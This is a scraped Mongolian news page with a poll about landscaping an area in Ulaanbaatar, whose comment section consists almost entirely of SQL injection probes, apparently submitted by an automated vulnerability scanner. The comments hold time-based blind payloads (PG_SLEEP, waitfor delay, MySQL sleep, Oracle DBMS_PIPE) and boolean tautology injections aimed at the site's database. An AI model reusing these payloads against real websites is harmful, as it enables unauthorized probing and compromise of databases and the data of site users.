Билгийн

Доллар (USD)

Улаанбаатар

УДЭТ-ын урд талыг ногоон байгууламж болгох санал гаргажээ. Та үүнтэй санал нийлж байна уу?
image
image
image
image
image
image

179 Сэтгэгдэл
555
555
@@MBC3L
1����%2527%2522
1'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
fkd2Kt6o')) OR 294=(SELECT 294 FROM PG_SLEEP(15))--
qLY0Afjl') OR 659=(SELECT 659 FROM PG_SLEEP(15))--
yaeKL74g' OR 863=(SELECT 863 FROM PG_SLEEP(15))--
-1)) OR 856=(SELECT 856 FROM PG_SLEEP(15))--
-5) OR 176=(SELECT 176 FROM PG_SLEEP(15))--
-5 OR 104=(SELECT 104 FROM PG_SLEEP(15))--
aJboXrgj'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1" OR 2+660-660-1=0+0+0+1 --
-1' OR 2+917-917-1=0+0+0+1 or 'mCPTt1Pl'='
-1 OR 2+738-738-1=0+0+0+1
-1' OR 2+660-660-1=0+0+0+1 --
-1 OR 2+347-347-1=0+0+0+1 --
WOdCnhiY
555
555
555
Хамгийн их уншсан